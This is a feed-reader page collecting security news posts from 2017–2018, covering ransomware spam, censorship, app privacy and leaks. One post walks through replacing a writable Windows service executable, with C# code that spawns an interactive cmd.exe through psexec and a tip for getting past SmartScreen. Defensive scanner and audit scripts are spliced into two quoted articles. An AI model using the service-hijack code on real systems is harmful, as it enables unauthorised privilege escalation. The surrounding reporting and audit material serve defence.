Shared posts

26 Sep 18:17

Open-source software supply chain vulns have doubled in 12 months

by John Leyden

Hackers 'mainlining' vulns into projects – report

Use of vulnerable open source components has doubled over the last year despite their role in the high profile Equifax mega-breach.…

26 Sep 18:15

Once Popular Online Ad Format Opens Top Tier Sites to XSS Attacks

by Tom Spring
Online ad industry moves away from once prolific ads that are now deemed insecure because of DOM-based XSS vulnerabilities.
26 Sep 15:35

Former Google Scientist Tells Senate to Act Over Company’s “Unethical and Unaccountable” China Censorship Plan

by Ryan Gallagher

A scientist who quit Google over its plan to build a censored search engine in China has told U.S. senators that some company employees may have “actively subverted” an internal privacy review of the system.

Jack Poulson resigned from Google in August after The Intercept reported that a group of the internet giant’s staffers was secretly working on a search engine for China that would remove content about subjects such as human rights, democracy, peaceful protest, and religion. “I view our intent to capitulate to censorship and surveillance demands in exchange for access to the Chinese market as a forfeiture of our values and governmental negotiating position across the globe,” Poulson told his bosses.

Now, Poulson has sent a letter to members of the Senate Committee on Commerce, Science, and Transportation ahead of a hearing on Wednesday at which Keith Enright, Google’s chief privacy officer, is scheduled to appear. Despite a major internal and external backlash over a period of almost two months, Google has so far refused to publicly address questions about its China censorship plan, code-named Dragonfly. The appearance of Enright on Capitol Hill is likely to be the first time a representative of the company is forced to provide answers about the project.

In his letter to the senators, Poulson said that there has been “a pattern of unethical and unaccountable decision making from company leadership” at Google. He called on the lawmakers to pressure Enright to respond to concerns raised by 14 leading human rights groups, who said in late August that Dragonfly could result in Google “directly contributing to, or [becoming] complicit in, human rights violations.”

Poulson also shared information about Dragonfly with the senators. He told the lawmakers that in the process of developing the Chinese search platform, there was “a catastrophic failure of the internal privacy review process, which one of the reviewers characterized as [having been] actively subverted.”

The “catastrophic failure” Poulson mentioned relates to an internal dispute between Google employees who work on privacy issues and engineers who developed the censored search system, sources said. The privacy reviewers approved aspects of the code for Dragonfly after they were told it did not involve user data. After The Intercept exposed the project in early August, the privacy reviewers took another look at the code and felt that their colleagues working on Dragonfly had seriously and purposely misled them. The system did involve user data and had been designed to link users’ search queries to a personal phone number, track users’ movements, IP addresses, and information about the devices they use and the links they clicked on.


Jack Poulson.

Photo: Courtesy of Jack Poulson

Poulson told the senators that he could “directly verify” that a prototype of Dragonfly would allow a Chinese partner company to “search for a given user’s search queries based on their phone number.” He added that the censorship blacklist developed for the system contained the English term “human rights,” the Mandarin terms for “student protest” and “Nobel prize,” and “very large numbers of phrases involving ‘Xi Jinping’ and other members” of China’s ruling Communist Party regime.

Poulson said that the Dragonfly system contained code to “ensure only Chinese government-approved air quality data would be returned in response to Chinese users’ search.” The country’s authorities have a history of manipulating pollution data, raising the possibility that Google would provide Chinese citizens with false information to downplay the amount of toxins in the air.

“Dragonfly is part of a broad pattern of unaccountable decision-making across the tech industry,” Poulson told the senators. “It has been made clear, both by word and by action, that the leadership at Google will be clamping down on the types of internal investigation that were necessary to bring Project Dragonfly to light. I would hope that the committee would help protect the environment needed for future whistleblowers by taking steps to guarantee ethical transparency and oversight across Silicon Valley.”

“Dragonfly is part of a broad pattern of unaccountable decision-making.”

Poulson, who was previously an assistant professor at Stanford University’s department of mathematics, worked in Google’s research and machine intelligence division as a senior research scientist. He did not work on the China search engine, but one of his responsibilities involved “international query analysis,” improving Google’s search accuracy across a wide variety of languages, and his output could have been integrated into Dragonfly without his knowledge. He joined Google in May 2016 and worked out of the company’s Mountain View headquarters for a year before relocating to offices in Toronto.

Google launched a censored search engine in China in 2006, but stopped operating the service in 2010, citing concerns about Chinese government censorship and efforts to hack activists’ Gmail accounts. Google co-founder Sergey Brin said in 2010 that he saw “earmarks of totalitarianism” in China in relation to censorship and surveillance, which he said he found “personally quite troubling.”

Poulson told The Intercept in an interview earlier this month that he “very much agree[s] with the case Sergey made in 2010. That’s the company I joined, the one that was making that statement.” If Google was now reversing its anti-censorship position, he said, then he could no longer “be complicit as a shareholder and citizen of the company.”

Google did not respond to a request for comment on this story.

Top photo: Google’s display at the first China Smart Expo 2018 in Chongqing, China, on Aug. 23, 2018.

The post Former Google Scientist Tells Senate to Act Over Company’s “Unethical and Unaccountable” China Censorship Plan appeared first on The Intercept.

26 Sep 15:35

Apple Forces Facebook VPN App Out of iOS Store for Stealing Users' Data

by noreply@blogger.com (Mohit Kumar)
Facebook yesterday removed its mobile VPN app called Onavo Protect from the iOS App Store after Apple declared the app violated the iPhone maker's App Store guidelines on data collection. For those who are unaware, Onavo Protect is a Facebook-owned Virtual Private Network (VPN) app that was primarily designed to help users keep tabs on their mobile data usage and acquired by Facebook from an
26 Sep 15:34

Millions of Twitter DMs may have been exposed by year-long bug

by Lisa Vaas
Though the bug was present for over a year, Twitter hasn't found any DMs or protected tweets that were delivered to the wrong developer.
26 Sep 15:33

Ex-NSA Developer Gets 5.5 Years in Prison for Taking Top Secret Documents Home

by noreply@blogger.com (Mohit Kumar)
A former NSA employee has been sentenced to five and a half years in prison for illegally taking a copy of highly classified documents and hacking tools to his home computer between 2010 and 2015, which were later stolen by Russian hackers. Nghia Hoang Pho, 68, of Ellicott City, Maryland—who worked as a developer with Tailored Access Operations (TAO) hacking group at the NSA since April 2006—
25 Sep 13:26

The Implications of Defending Forward in the New Pentagon Cyber Strategy

by Guest Blogger for Net Politics
Ben Buchanan is an assistant teaching professor at Georget
09 Nov 15:00

Russian 'Fancy Bear' Hackers Using (Unpatched) Microsoft Office DDE Exploit

by noreply@blogger.com (Swati Khandelwal)
Cybercriminals, including state-sponsored hackers, have started actively exploiting a newly discovered Microsoft Office vulnerability that Microsoft does not consider as a security issue and has already denied to patch it. Last month, we reported how hackers could leverage a built-in feature of Microsoft Office feature, called Dynamic Data Exchange (DDE), to perform code execution on the
20 Oct 13:55

A Look at Locky Ransomware’s Recent Spam Activities

by Rubio Wu (Threats Analyst)

Ransomware has been one of the most prevalent, prolific, and pervasive threats in the 2017 threat landscape, with financial losses among enterprises and end users now likely to have reached billions of dollars. Locky ransomware, in particular, has come a long way since first emerging in early 2016. Despite the number of times it has apparently gone on hiatus, Locky remains a relevant and credible threat given its impact on end users and especially businesses. Our detections show that it's making another comeback with new campaigns.

A closer look at Locky's activities reveals a constant: the use of spam. While spam remains a major entry point for ransomware, other families such as Cerber also use vectors like exploit kits. Locky, however, appears to concentrate its distribution through large-scale spam campaigns regardless of the variants released by its operators/developers. Here's a visualization of its distribution from January 2 to September 8:


Figure 1: A timeline of Locky ransomware detections based on partial feedback from our email-based sensors

The Necurs Connection
We've also found that the scale and scope of Locky's distribution are fueled by the Necurs botnet, a spam distribution infrastructure comprising zombified devices. It churns out a sizeable volume of spam emails carrying information stealers like Gameover ZeuS, ZBOT or Dridex, and other ransomware families such as CryptoLocker, CryptoWall, and Jaff.

Necurs is Locky’s known and long-time partner in crime, and it’s no coincidence that the surge of Locky-bearing spam emails corresponds with the uptick in Necurs’ own activity. In fact, we saw that Necurs actively pushed Locky from August to October. Here’s a timeline:


Figure 2: Necurs botnet distributing Locky variants from August 29 to October 11, 2017

It's also worth noting that Necurs also distributed Locky via URL-only spam emails—that is, the messages didn't carry any attachments, only links that divert users to compromised websites hosting the ransomware. HTML attachments embedding links to the compromised sites also started gaining traction this year.

Interestingly, we saw a sizeable URL-only spam campaign that delivered the Trickbot banking malware (TSPY_TRICKLOAD) separately. The routine is similar to another campaign we observed, where cybercriminal operators rotated their payloads between FakeGlobe and Locky. In some of our tests, we found that the payload depended on the region: western countries are more likely to be served with Trickbot, while countries like Japan and Taiwan, for instance, are more likely to get Locky.


Figure 3: A sample URL-only spam email that delivered either Trickbot or Locky

Spam attachments: Locky’s testing ground?
The timing of Locky's lulls and surges matches other cybercriminal activities. They can also be construed as intervals used to fine-tune and diversify Locky's infection chains. This is the likeliest case with the recent Diablo and Lukitus variants, which used malicious PDF and image files (i.e., JPEG, TIFF), or attachments posing as such. These are deviations from the usual vectors: Word documents embedded with malicious macro code or Visual Basic scripts (VBS).

And indeed, we've seen Locky diversify in terms of the spam email attachments it uses. The Necurs botnet, for instance, increasingly favors the distribution of spam emails with HTML files. The Locky spam campaign we monitored in mid-September also used Word documents with malicious macros, but ones coded to run and download Locky only after the user closes the file. Locky has also abused Windows Script Files (WSF) and dynamic-link libraries (DLL) as infection vectors, so it's not implausible for the ransomware to misuse other file types and expand beyond macros, VBSes, or HTML files. Here's a breakdown of the file attachments used by Locky-laced spam emails we've seen so far:


Figure 4: The file types used by Locky-carrying spam emails from January to September 2017; note that the VBS, JS, and JSE files are archived via RAR, ZIP or 7ZIP files
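The attachment types listed above translate directly into a gateway triage rule. The following scanner is an added example, not code from the Trend Micro post: it classifies attachments by the Locky vector types named above, descends into nested ZIP archives (since the post notes that the VBS, JS and JSE payloads arrive archived), flags RAR/7z as opaque because the standard library cannot open them, and caps nesting depth. The sample attachments are constructed placeholders, not real malware.

```python
from __future__ import annotations

import io
import zipfile
from dataclasses import dataclass

# Extensions the post reports as Locky infection vectors.
BLOCK = {"vbs", "js", "jse", "wsf", "dll"}          # scripts/binaries carried by Locky spam
REVIEW = {"doc", "docm", "html", "htm", "pdf"}      # lure documents needing macro/link scanning
OPAQUE_ARCHIVES = {"rar", "7z"}                     # not readable with the standard library
MAX_DEPTH = 3                                       # guard against deeply nested archives

SEVERITY = {"allow": 0, "review": 1, "opaque-archive": 2, "block": 3}


@dataclass
class Finding:
    path: str      # e.g. "outer.zip/inner.zip/payload.js"
    verdict: str   # one of SEVERITY's keys
    reason: str


def _ext(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def scan_bytes(name: str, data: bytes, depth: int = 0) -> list[Finding]:
    """Classify one attachment, recursing into ZIP members."""
    ext = _ext(name)
    if ext == "zip":
        if depth >= MAX_DEPTH:
            return [Finding(name, "review", f"nesting deeper than {MAX_DEPTH} levels")]
        try:
            zf = zipfile.ZipFile(io.BytesIO(data))
        except zipfile.BadZipFile:
            return [Finding(name, "review", "unreadable ZIP archive")]
        findings: list[Finding] = []
        with zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                member = f"{name}/{info.filename}"
                try:
                    payload = zf.read(info)
                except RuntimeError:  # password-protected member
                    findings.append(Finding(member, "review", "encrypted ZIP member"))
                    continue
                findings.extend(scan_bytes(member, payload, depth + 1))
        return findings or [Finding(name, "allow", "empty archive")]
    if ext in OPAQUE_ARCHIVES:
        return [Finding(name, "opaque-archive", "RAR/7z not inspected; detonate in sandbox")]
    if ext in BLOCK:
        return [Finding(name, "block", f".{ext} is a script/binary type Locky spam has carried")]
    if ext in REVIEW:
        return [Finding(name, "review", f".{ext} used as a Locky lure; scan macros/links")]
    return [Finding(name, "allow", "extension not in the Locky vector list")]


def verdict(name: str, data: bytes) -> tuple[str, list[Finding]]:
    """Worst verdict across the attachment and everything nested inside it."""
    findings = scan_bytes(name, data)
    worst = max(findings, key=lambda f: SEVERITY[f.verdict])
    return worst.verdict, findings


def build_zip(members: dict[str, bytes]) -> bytes:
    """Helper to construct in-memory ZIP samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member_name, member_data in members.items():
            zf.writestr(member_name, member_data)
    return buf.getvalue()


# Constructed samples mirroring the post's lures (fake audit report with a
# nested script, RAR "budget", HTML "voicemail", and a harmless image).
INNER = build_zip({"invoice_2017.js": b"// placeholder script body\n"})
SAMPLES = {
    "audit_report.zip": build_zip({"report.txt": b"plain text", "nested.zip": INNER}),
    "budget.rar": b"Rar!\x1a\x07\x00" + b"\x00" * 16,
    "voicemail.html": b"<html><a href='http://example.invalid/play'>play</a></html>",
    "photo.jpg": b"\xff\xd8\xff\xe0",
}

if __name__ == "__main__":
    for sample_name, sample_data in SAMPLES.items():
        v, fs = verdict(sample_name, sample_data)
        print(f"{sample_name}: {v}")
        for f in fs:
            print(f"    {f.path}: {f.verdict} ({f.reason})")
```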

Locky’s common social engineering lures
Indeed, the continuous changes in Locky’s use of file attachments are its way of adjusting its tools to evade or bypass traditional security. But despite the seeming variety, there are common denominators in Locky’s social engineering, particularly in the email subjects and content. They appear to have the same old flavors, but with relatively different twists. Some of the recent lures we saw were:

  • Fake voice message notifications (vishing, or the use of voice-related systems in phishing attacks)
  • HTML attachments posing as invoices
  • Archive files masquerading as business missives from multinationals, e.g., audit and budget reports
  • Fraudulent emails that involve monetary transactions such as bills, parcel/delivery confirmations, and payment receipts

Mind your gaps
The delivery mechanism is a critical component for any ransomware. Locky's infection vectors—and its adverse impact on affected systems—demonstrate the significance of a multilayered approach to safeguarding the privacy, security, and integrity of the gateways, endpoints, networks or servers that manage or store mission-critical, corporate or personal data. Follow and apply best practices against ransomware: keep the system patched, secure the email gateway, and regularly back up data. Enterprises should implement defense in depth: enforce the principle of least privilege, keep the system and its applications updated (or employ virtual patching), and incorporate additional layers of security against malicious files and network activities that can be exploited by ransomware. More importantly, foster a culture of cybersecurity—the technologies that thwart threats are only as effective as the people who use them.

Trend Micro Solutions
Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop threats like Locky before they reach the network. Email and web gateway solutions such as Trend Micro™ Deep Discovery™ Email Inspector and InterScan™ Web Security prevent ransomware from ever reaching end users. At the endpoint level, Trend Micro™ Smart Protection Suites, powered by XGen™ Security, deliver several capabilities like high-fidelity machine learning, behavior monitoring and application control, and vulnerability shielding that minimizes Locky’s impact.

Trend Micro™ Deep Security™ stops ransomware from reaching enterprise servers, whether physical, virtual or in the cloud. Trend Micro™ Worry-Free Services Advanced offers cloud-based email gateway security to small businesses through Hosted Email Security. Its endpoint protection also delivers several capabilities such as behavior monitoring and real-time web reputation in order to detect and block ransomware. For home users, Trend Micro Security 10 provides strong protection against ransomware by blocking malicious websites, emails, and files associated with this threat.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro


18 Oct 11:10

IRS tax bods tell Americans to chill out about Equifax

by Richard Chirgwin

Your personal data was probably already in crims' hands

The United States Internal Revenue Service has said that citizens affected by the Equifax breach need not panic, because it probably didn't reveal anything that hasn't already been stolen and the agency has tooled up to deal with fraudulent tax claims.…

18 Oct 10:51

Internet of Ships falling down on security basics

by Taylor Armerding
While most modern ships may not have physical leaks, they are catastrophically porous when it comes to cyber security.
18 Oct 10:50

Enable Google's New "Advanced Protection" If You Don't Want to Get Hacked

by noreply@blogger.com (Swati Khandelwal)
It is good to be paranoid when it comes to cybersecurity. Google already provides various advanced features such as login alerts and two-factor authentication to keep your Google account secure. However, if you are extra paranoid, Google has just introduced its strongest ever security feature, called "Advanced Protection," which makes it easier for users, who are usually at high risk of
05 Sep 14:18

Want to write Android ransomware but don't know how to code? No problem

by Graham Cluley

You don't need to know how to write a single line of code to write Android ransomware.

05 Sep 14:18

Abusing A Writable Windows Service

by Didier Stevens

A friend had a problem: he found a Windows service with a writable executable (e.g. writable by a non-admin user), replaced it with a copy of cmd.exe, but got no prompt.

This is because of 2 reasons.

First, a Windows service is a Windows executable (PE file) that must be able to interact with the Service Control Manager when the SCM loads the executable. Since cmd.exe does not have the capability to interact with the SCM, the SCM will quickly stop the cmd.exe executable. On my Windows VM, cmd.exe ran only 200 milliseconds when launched by the SCM.

Here you can see how the SCM reacts when it launches cmd.exe:

This problem can be solved by creating a Windows service executable that launches cmd.exe upon starting. Creating such a Windows service with .NET is easy, here is the minimum C# source code for a service that launches cmd.exe upon starting:

using System.ServiceProcess;

namespace Demo
{
    // Deriving from ServiceBase gives the executable the SCM handshake that
    // cmd.exe lacks, so the SCM no longer stops it right after launch.
    public class Service : ServiceBase
    {
        protected override void OnStart(string[] args)
        {
            // Runs in the service's own session (session 0), so no console
            // window is visible to a logged-on user.
            System.Diagnostics.Process.Start("cmd.exe");
        }
    }

    // Entry point: hands the service object to the SCM.
    static class Program { static void Main() { ServiceBase.Run(new ServiceBase[] { new Service() }); } }
}

cmd.exe will be running, but we will still not have a console window. This is because of the second reason: Windows services run in session 0 and session 0 does not allow user interfaces. So cmd.exe runs in session 0 and my friend’s user account runs in session 1. If we can make cmd.exe run in session 1, then my friend can interact with the console.

There is a quick solution for this: psexec. With psexec’s option -i, one can specify in which session the program launched by psexec must run.
So our minimal code for a service becomes:

using System.ServiceProcess;

namespace Demo
{
    public class Service : ServiceBase
    {
        protected override void OnStart(string[] args)
        {
            // psexec: -accepteula suppresses the EULA dialog, -d does not wait
            // for cmd.exe to exit, -i 1 launches it in session 1 (the
            // interactive user's session) instead of session 0.
            System.Diagnostics.Process.Start(@"c:\demo\psexec.exe", @"-accepteula -d -i 1 cmd.exe");
        }
    }

    // Entry point: hands the service object to the SCM.
    static class Program { static void Main() { ServiceBase.Run(new ServiceBase[] { new Service() }); } }
}

This simple service can be compiled with the C# compiler csc.exe:

In this example, I install the service with command “sc create Service type= own binpath= c:\demo\Service.exe”, but of course, my friend did not have to do this (this requires admin rights), he just had to replace the service’s executable:

When I first tried this, it did not work. Looking through procmon's logs for service.exe, I saw that the psexec executable was never loaded. At the end of the logs, I saw references to smartscreen.exe, and then quickly thereafter, service.exe stopped running. That's when it dawned on me: when I downloaded psexec, I left the mark-of-the-web on the file. SmartScreen did not allow psexec to run because it was downloaded from the Internet. After removing that mark, it all ran without problem.
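The root cause of the problem described here is a service executable that a non-admin user can overwrite. The following audit script is an added example, not code from this post: it enumerates installed services, resolves each binary path, and reports executables whose ACL grants write, delete or DAC/owner rights to low-privilege principals, alongside the account the service runs as. It assumes Windows PowerShell 5.1 or later on Windows; the principal list is a starting point and may need local groups added.

```powershell
# Added audit script (not from the original post): find services whose
# executable can be replaced by a low-privilege user.
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the file be altered or replaced outright.
$WriteRights = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::AppendData -bor
               [System.Security.AccessControl.FileSystemRights]::Delete -bor
               [System.Security.AccessControl.FileSystemRights]::WriteDac -bor
               [System.Security.AccessControl.FileSystemRights]::WriteOwner

function Get-ServiceBinaryPath {
    # Extract the executable from a Win32_Service PathName such as
    #   "C:\Program Files\Demo\Service.exe" -arg   or   C:\demo\Service.exe -arg
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
    }
    # Unquoted: take everything up to and including the first ".exe".
    $m = [regex]::Match($p, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($p -split ' ')[0]
}

function Test-WritableByLowPriv {
    # Return the first Allow ACE that gives a low-privilege principal write
    # rights on the file, or $null if none.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteRights) -ne 0) { return $ace }
    }
    return $null
}

Get-CimInstance Win32_Service | ForEach-Object {
    $exe = Get-ServiceBinaryPath $_.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }
    try { $ace = Test-WritableByLowPriv $exe } catch { return }   # ACL unreadable: skip
    if ($ace) {
        [pscustomobject]@{
            Service   = $_.Name
            RunsAs    = $_.StartName      # e.g. LocalSystem: worst case for a writable binary
            StartMode = $_.StartMode
            Binary    = $exe
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
        }
    }
} | Format-Table -AutoSize
```

The script checks only the executable's own ACL; a writable parent directory also allows the binary to be renamed and replaced, so directories of any hit deserve the same Get-Acl review.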



28 Aug 14:09

Hit App Sarahah Quietly Uploads Your Address Book

by Yael Grauer

Sarahah, a new app that lets people sign up to receive anonymized, candid messages, has been surging in popularity; somewhere north of 18 million people are estimated to have downloaded it from Apple and Google’s online stores, making it the No. 3 most downloaded free software title for iPhones and iPads.

Sarahah bills itself as a way to “receive honest feedback” from friends and employees. But the app is collecting more than just feedback messages. When launched for the first time, it immediately harvests and uploads all phone numbers and email addresses in your address book. Although Sarahah does in some cases ask for permission to access contacts, it does not disclose that it uploads such data, nor does it seem to make any functional use of the information.

Zachary Julian, a senior security analyst at Bishop Fox, discovered Sarahah’s uploading of private information when he installed the app on his Android phone, a Galaxy S5 running Android 5.1.1. The phone was outfitted with monitoring software, known as Burp Suite, which intercepts internet traffic entering and leaving the device, allowing the owner to see what data is sent to remote servers. When Julian launched Sarahah on the device, Burp Suite caught the app in the act of uploading his private data.

“As soon as you log into the application, it transmits all of your email and phone contacts stored on the Android operating system,” he said. He later verified the same occurs on Apple’s iOS, albeit after a prompt to “access contacts,” which also appears in newer versions of Android. Julian also noticed that if you haven’t used the application in a while, it’ll share all of your contacts again. He did some testing of the app on a Friday night, and when he booted the app on a Sunday morning, it pushed all of his contacts again. (You can see some of his testing in this video.)

Sarahah did not initially respond to requests for comment. After this piece was published, the app’s creator, Zain al-Abidin Tawfiq, tweeted that the contacts functionality would be removed in a future release and had been intended for a “‘find your friends’ feature.” He later told The Intercept the feature was stymied by “technical issues” and that a partner, who he has since stopped working with, was supposed to remove it from the app but “missed that.” He claims the functionality was, however, removed from the server and that Sarahah stores no contacts in its databases. This is impossible to verify.

Drew Porter, founder of security firm Red Mesa, said that this type of behavior is more common than most users would expect, especially when apps, like Sarahah, are free. He said that even if users are willing to trust a piece of software with their address book data, there are reasons to avoid trusting the internet servers associated with the app. “It’s no longer that you have to worry about the data on your phone, it’s that you have to worry about the data on your phone that’s somewhere else that you have no control over being compromised,” he said. “It’s not just, ‘Oh, this company can see my information and I’m OK with that.’ You now have to think about the security of that company.”

When asked about Sarahah, Porter added, “I do find it concerning, mostly because the information that the company may be getting could be what other people consider very private, and you don’t know the security of the company that is getting it. We’ve seen popular apps before, total information leakage comes out, and it’s devastating to those companies. I believe it’s even more devastating to the user whose information was compromised.”

Will Strafach, president of Sudo Security Group Inc., pointed out that security researchers and app reviewers can only see what is happening on the device itself, rather than server side, making it impossible for anyone but the developer to know if the data is being stored or just used, and if stored, how well it is protected. “Even in an innocent use case, if the data is not being handled safely, a server breach could allow malicious parties access to this contacts data,” he said. “Additionally, there is no silver bullet to solving this. My team wrote software to automatically detect this behavior in iOS apps in order to call out bad actors, but we found that the information was not as useful as anticipated, because so many apps are doing it, and there is no reliable way to tell if the data is being handled safely on the server’s side, and that is the most important part.”

But Julian thinks that Sarahah uploading contacts is disconcerting, especially given the app’s popularity, and especially since most users don’t expect it to occur. On iOS, the app says, “The app needs to access your contacts to show you who has an account in Sarahah,” and allows the user to choose between “OK” and “Don’t Allow.” On Android, the app in some cases requests access to contacts without giving any reason for needing such access, and in other cases makes no such request. On neither operating system does it mention uploading data to a server. “The privacy policy specifically states that if it plans to use your data, it’ll ask for your consent,” Julian said. While the app’s entry in Google’s Play Store does indicate the app will access contacts, that’s not “enough consent” to justify “sending all of those contacts over without any kind of specific notification,” he added.

Despite claiming on iOS to use contact data to show the user who in their address book is on Sarahah, the app does not actually do so, Julian said, judging from his testing. If Sarahah did ever begin showing which of your contacts are on its network, as advertised, this would lead to a new problem: It would make it far easier to deduce who is sending messages. For now, it’s not clear how the data is being used.

“Sarahah has between 10 and 50 million installs on just the Play Store alone for Android, so if you extrapolate that number, it could easily get into hundreds of millions of phone numbers and email addresses that they’ve harvested,” Julian said. Sarahah is among the top five most downloaded apps in Google’s Play Store for Android, according to analytics firm App Annie.

It’s not entirely clear what Sarahah uses uploaded contact lists for, although the app’s privacy policy states that it will not sell the information to third parties without prior and written consent, unless it’s part of bulk data used for statistics and research.

Newer Android operating systems, starting with Android 6.0 ("Marshmallow"), do allow more granular permissions for apps, letting users modify controls so that apps do not gain access to contacts or other information. However, all but the most expensive Android phones are notoriously slow to receive updates like Marshmallow, and around 54 percent of Android users are using older versions that don't have these permissions. Users also have to be savvy enough to know where to find the app permissions (Settings > Apps > Gear button > App permissions).

Other apps that send users’ contacts to external servers are more forthright in their privacy policies. For example, the so-called ephemeral messaging app, Snapchat, which settled FTC charges in 2014 that its promises of disappearing messages were false, and which also transmitted user location and collected user address books without notice or consent, now has a robust privacy policy which states that the app “may — with your consent — collect information from your device’s phonebook,” and that if you allow this, and you’re in another user’s contacts, that it may combine information collected from their phone book with what they have collected about you. The prompt to add contacts states: “Find your friends. See which of your contacts are on Snapchat!” and the popup on iOS clearly says that the contacts will be uploaded to Snapchat’s servers “so you and others can find friends, and to improve your experience.”

Sarahah appears to be a much smaller operation than Snapchat. It was created in Saudi Arabia by Tawfiq, according to news accounts. It is just the latest in a series of apps pairing promises of anonymity with troubling privacy practices. Another was Secret, now defunct, which was supposed to traffic in anonymized messages from friends and mutual friends. In 2014, security researchers were able to decloak posters on the app by tricking the app’s contact-matching system.

A silver lining for Sarahah users concerned about privacy is that they don’t need to download the service’s app. It’s possible to send messages on Sarahah and register to receive messages on Sarahah, via a website. And that site doesn’t ask for or access contacts from any of your digital address books.

Still, if Sarahah intends to continue scooping up user’s contact data via mobile apps, Julian believes a more responsible path for the company would be to specifically inform the user about what data they are giving up and where it is going — and to provide them with a legitimate reason as to why the app actually needs it.

Top photo: A photo of Sarahah, a new app that lets people anonymously critique one another.

Update: Aug. 27, 2017, 1:35 p.m.

This piece was updated to include a new estimate of Android Sarahah installs from Julian.

Update: Aug. 27, 2017, 9:45 p.m.

This piece was updated to include a response from the creator of Sarahah.

The post Hit App Sarahah Quietly Uploads Your Address Book appeared first on The Intercept.

24 May 19:08

ATTRIBUTION GAMES: LAZARUS, SHADOWBROKERS, BLOFELD.

by Krypt3ia

The Game:

I figured since everyone else is playing the ATTRIBUTION GAMES over Wannacrypt0r that I would get in on the action and give it my own personal spin. The big difference here is that I am not selling any of you anything so if you read this post it is all about not buying my shiny new machine learning, next gen machine that goes PING! Nope, I just thought I would put a few words down to stop the insanity so to speak that I already see in the eyes of those $VENDOR’s out there about to hit SEND on their latest salvo of shenanigans concerning the Wannacry event of last week.

That’s right, I am already calling shenanigans!

Right so this game here is a red team on the idea that Wannacry was either an APT Nation State actor (either LAZ or SHADOW) or a criminal gang who will be represented by Ernst Stavro Blofeld. Once this is all said and done I hope that some sanity will ensue and more to the point, some elaborate death will be planned out, set into motion, and then foiled by James Bond…

Wait… what?

Let’s begin… DOMINATION OF THE WORLD….. Let’s just list the indicators and possible motivations all kinds of bulletized shall we?

THE LAZARUS GROUP (UNIT 180):

  • LAZARUS code snippets found in WANNACRY samples
  • LAZARUS has been active in stealing large sums of money from banks, as this attack was about ransom and money… well… UNDERPANTS GNOMES AND PROFIT!
  • LAZARUS aka Un, would likely love to sow terror by unleashing the digital hounds with malware attacks like this to prove a point, that they are out there and to be afraid.
  • LAZARUS aka Un, might have done this not only to sow fear but also to say to President CRAZYPANTS (Official USSS code name btw) “FEAR US AND OUR CYBER PROWESS
  • LAZARUS aka Un, is poor and needs funds so ransoming hospitals and in the end gathering about $100k is so gonna fill the coffers!
  • LAZARUS aka UNIT 180 players are “Freelancing” and using TTP’s from work to make MO’ MONEY MO’ MONEY MO’ MONEY (No! Someone actually really floated that idea!)
  • LAZARUS is a top flight spooky as shit hacking group that needed to STEAL code from RiskSense (lookit that IPC$ from the pcap yo) to make their shit work.. Huh?

SHADOWBROKERS (GRU):

  • SHADOWBROKERS made no money on their auction and posted a long pissy diatribe about it after the incident reached critical media frenzy
  • SHADOWBROKERS had the code already and then needed to CRIB some of the ETERNALBLUE/FUZZBUNCH NSA code ganked from RiskSense because they lack the ability to make the shit work themselves… Which they then re-coded in C…  Huh?
  • SHADOWBROKERS want to just sow mayhem with WANNACRY and continue the massive schadenfreude that the NSA is feeling from their theft (*cough MOLE HUNT cough*) but once again, they had to STEAL that code snippet to make it work… Or, is that just another poke at the US? A diversion? A red herring so to speak? Hmmmm….
  • SHADOWBROKERS re-used or re-purposed old malware WANNACRYPT0R and threw in some code snippets from LAZARUS GROUP TTP’s to muddy the waters and have EVERYONE pointing their collective fingers at the Hermit Nation because WHY THE FUCK NOT HUH!? This would sow more FUD and gee, isn’t that the playbook chapter like 3 in ACTIVE MEASURES komrade?

ERNST STAVRO BLOFELD:

  • ERNST has a well known volcano lair and upkeep is rather steep in this global market so ransomware is the way to go baby!
  • ERNST is a Devil may care kind of guy and wants to sprinkle clues for both RUSSIAN and DPRK actors here to cause all kinds of mayhem while he sits and strokes his cat while the bitcoins amass.
  • ERNST is a gangster and his coders, well, sometimes they suck so they stole the ETERNALBLUE snippets but then they couldn’t make that work UNTIL they coded it all in C so.. yeah..
  • ERNST is a nihilist at heart so he just slapped this shit together and then made sure that there was a killswitch in there as a safety valve, I mean, look at how many times he tried to kill Bond but always missed by that much!

Well there you have it. I have gamed it all out for you. Who do you think dunnit? If you look at all of these players and their motivations along with the superior threat intel evidence we have out there that the attribution firms are selling…

OBVIOUSLY IT’S ALL OF THEM! THEY ARE WORKING TOGETHER PEOPLE! IT’S THE NEW SPECTRE! CAN’T YOU ALL SEE THAT WITH THE PLETHORA OF EVIDENCE WE HAVE! COME ON!

*breathe…..**

Ok ok ok… See what I did there? I am making a point with humor.

IT DOESN’T FUCKING MATTER WHO DID IT!

PATCH YOUR SHIT.

DO THE THINGS.

STOP.

Dr. K.


19 May 13:35

WikiLeaks Reveals 'Athena' CIA Spying Program Targeting All Versions of Windows

by noreply@blogger.com (Mohit Kumar)
WikiLeaks has published a new batch of the ongoing Vault 7 leak, detailing a spyware framework – which "provides remote beacon and loader capabilities on target computers" – allegedly being used by the CIA that works against every version of Microsoft's Windows operating systems, from Windows XP to Windows 10. Dubbed Athena/Hera, the spyware has been designed to take full control over the
15 May 13:55

